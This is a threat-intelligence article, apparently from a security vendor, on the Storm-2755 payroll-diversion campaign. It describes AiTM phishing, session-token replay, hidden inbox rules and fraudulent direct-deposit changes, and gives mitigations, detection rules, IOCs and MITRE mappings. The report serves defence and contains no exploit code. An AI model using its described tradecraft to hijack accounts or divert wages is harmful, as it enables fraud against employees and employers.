Critical Threat Research : The Iranian Cyber War Intensifies!
Comprehensive Threat Exposure Management Platform
Storm-2755 represents a sophisticated cybersecurity attack targeting Canadian employees through a financially motivated payroll diversion campaign that exploits Microsoft 365 and Microsoft Entra ID vulnerabilities. First observed in April 2026, the Storm-2755 attack campaign leverages advanced adversary-in-the-middle (AiTM) phishing techniques and exploits CVE-2025-27152, an Axios SSRF and credential leakage vulnerability, to silently compromise corporate accounts and redirect employee salary payments.
The Storm-2755 threat actor orchestrates this payroll theft attack by deploying fake Microsoft 365 login pages through malicious advertisements and search engine manipulation, capturing active session tokens to bypass multi-factor authentication (MFA) protections. Once inside compromised accounts, the Storm-2755 campaign maintains persistent access through session token refresh techniques, searches for payroll and human resources data, establishes inbox rules to hide malicious activity, and ultimately manipulates direct deposit information either through social engineering of HR teams or direct modification of payroll systems like Workday.
The Storm-2755 attack begins with sophisticated initial access tactics targeting Canadian employees through malicious advertisements and search engine manipulation that promote fraudulent Microsoft 365 login pages. These phishing pages deployed by Storm-2755 are carefully crafted to appear legitimate while serving as adversary-in-the-middle (AiTM) proxy servers. When victims authenticate through these fake Microsoft 365 portals, Storm-2755 intercepts and captures active session tokens rather than simple username-password combinations, enabling the threat actor to bypass traditional multi-factor authentication security controls.
The Storm-2755 campaign specifically exploits CVE-2025-27152, a critical vulnerability in Axios versions prior to 1.8.2 that allows SSRF and credential leakage through absolute URL bypass mechanisms. By leveraging this Axios vulnerability in version 1.7.9, Storm-2755 relays stolen session tokens and OAuth cookies from the AiTM phishing infrastructure to legitimate Microsoft 365 services, enabling authenticated session replay that circumvents non-phishing-resistant MFA implementations.
Once initial access is established, Storm-2755 maintains persistent access to compromised accounts through continuous session token refresh operations that avoid triggering typical security alerts. The Storm-2755 threat actor employs a malware-free approach, relying exclusively on legitimate authentication mechanisms and stolen session credentials to remain undetected within victim environments. In certain cases, Storm-2755 strengthens its foothold by modifying account passwords or authentication settings, ensuring continued access even if victims become suspicious.
Storm-2755 conducts extensive reconnaissance within compromised Microsoft 365 accounts, systematically searching emails and internal collaboration platforms for payroll data, direct deposit forms, HR contact information, and financial system access credentials. To maintain operational security, Storm-2755 creates inbox rules that automatically filter and hide messages containing financial keywords such as “direct deposit,” “bank,” “payroll,” and similar terms, routing these communications to hidden folders where victims cannot observe the attacker’s activities or any resulting alerts about account changes.
The final stage of the Storm-2755 attack involves executing the actual payroll diversion through multiple potential methods. Storm-2755 frequently sends convincing spearphishing emails to HR departments and finance teams using compromised employee accounts, requesting changes to direct deposit banking information under plausible pretenses. These internal phishing messages from Storm-2755 carry inherent credibility because they originate from legitimate employee accounts, making HR personnel more likely to process the fraudulent banking updates without additional verification.
When social engineering proves unsuccessful or infeasible, Storm-2755 directly accesses HR management platforms such as Workday using the compromised employee credentials, manually modifying direct deposit information to redirect salary payments into attacker-controlled bank accounts. This Storm-2755 attack methodology results in actual financial theft when the next payroll cycle executes, transferring legitimate employee wages to the threat actor while victims and organizations remain unaware until employees discover missing payments.
Organizations must immediately revoke all active tokens and sessions for accounts exhibiting Storm-2755 indicators of compromise, particularly sign-ins associated with the Axios user-agent string or connections to the bluegraintours[.]com domain. Conduct comprehensive audits of all mailbox rules across the organization, specifically searching for rules that filter on financial keywords including “direct deposit,” “bank,” and “payroll” that route messages to hidden folders, removing any unauthorized Storm-2755-created rules and restoring suppressed emails. Reset credentials and all registered MFA methods for affected accounts to prevent Storm-2755 from maintaining access through previously established persistent authentication mechanisms.
Enforce Conditional Access policies within Microsoft Entra ID to mandate device compliance requirements, restrict sign-ins from unmanaged devices, and apply session lifetime controls that limit token validity periods and force reauthentication at shorter intervals to disrupt Storm-2755 persistence techniques. Enable Continuous Access Evaluation (CAE) in Microsoft Entra to ensure access tokens are re-evaluated and revoked in near real-time when risk conditions change, such as user risk elevation or session anomaly detection that might indicate Storm-2755 activity. Block legacy authentication protocols that do not support modern security controls, reducing the attack surface available for Storm-2755 token replay and session hijacking techniques.
Create detection rules in SIEM and XDR platforms to generate alerts on sign-in events where the user-agent string contains “Axios” or “axios/1.7.9,” particularly when associated with non-interactive sign-ins to the OfficeHome application, which represents a key Storm-2755 attack indicator. Implement behavioral analytics to identify unusual patterns such as inbox rule creation immediately following authentication events, access to payroll-related documents from unusual locations or times, or sudden changes to direct deposit information that may signal Storm-2755 compromise. Monitor for connections to the bluegraintours[.]com domain and establish threat intelligence feeds to detect emerging Storm-2755 infrastructure.
Organizations using the Axios HTTP client in their applications must urgently upgrade to version 1.8.2 or later (or version 0.30.0 for legacy branches) to remediate CVE-2025-27152 and eliminate the SSRF and credential leakage vulnerabilities exploited by Storm-2755. Conduct comprehensive inventories of all applications and services utilizing Axios to ensure no unpatched instances remain that could be leveraged in future Storm-2755 attacks or similar campaigns exploiting this Axios vulnerability.
Domain: bluegraintours[.]com
User-Agent: axios/1.7.9
These Storm-2755 indicators of compromise should be immediately incorporated into security monitoring tools, proxy blacklists, and threat intelligence platforms to detect and block ongoing Storm-2755 attack activity.
Storm-2755 demonstrates sophisticated use of multiple MITRE ATT&CK techniques across the attack lifecycle. During Resource Development, Storm-2755 employs T1608.005 (Link Target) to stage malicious Microsoft 365 login pages and T1583.001 (Domains) to acquire infrastructure including the bluegraintours[.]com domain. For Initial Access, Storm-2755 utilizes T1566.003 (Spearphishing via Service) and T1189 (Drive-by Compromise) through malicious search advertisements.
Storm-2755 credential access techniques include T1557 (Adversary-in-the-Middle) phishing proxies and T1539 (Steal Web Session Cookie) to capture authentication tokens. Persistence is established through T1078.004 (Valid Cloud Accounts) using stolen credentials and T1098 (Account Manipulation) by modifying authentication settings. Storm-2755 conducts T1087 (Account Discovery) and T1114.002 (Remote Email Collection) during reconnaissance phases.
For Defense Evasion, Storm-2755 implements T1564.008 (Email Hiding Rules) to conceal malicious activities. The campaign employs T1534 (Internal Spearphishing) for lateral movement within organizations, ultimately achieving its financial theft objectives through T1657 (Financial Theft) by manipulating payroll systems.
Microsoft Security Blog: Investigating Storm-2755 Payroll Pirate Attacks Targeting Canadian Employees https://www.microsoft.com/en-us/security/blog/2026/04/09/investigating-storm-2755-payroll-pirate-attacks-targeting-canadian-employees/
GitHub Security Advisory: GHSA-jr5f-v2jv-69×6 (CVE-2025-27152) https://github.com/advisories/GHSA-jr5f-v2jv-69×6
Axios Security Patch Release v1.8.2 https://github.com/axios/axios/releases/tag/v1.8.2
Get through updates and upcoming events, and more directly in your inbox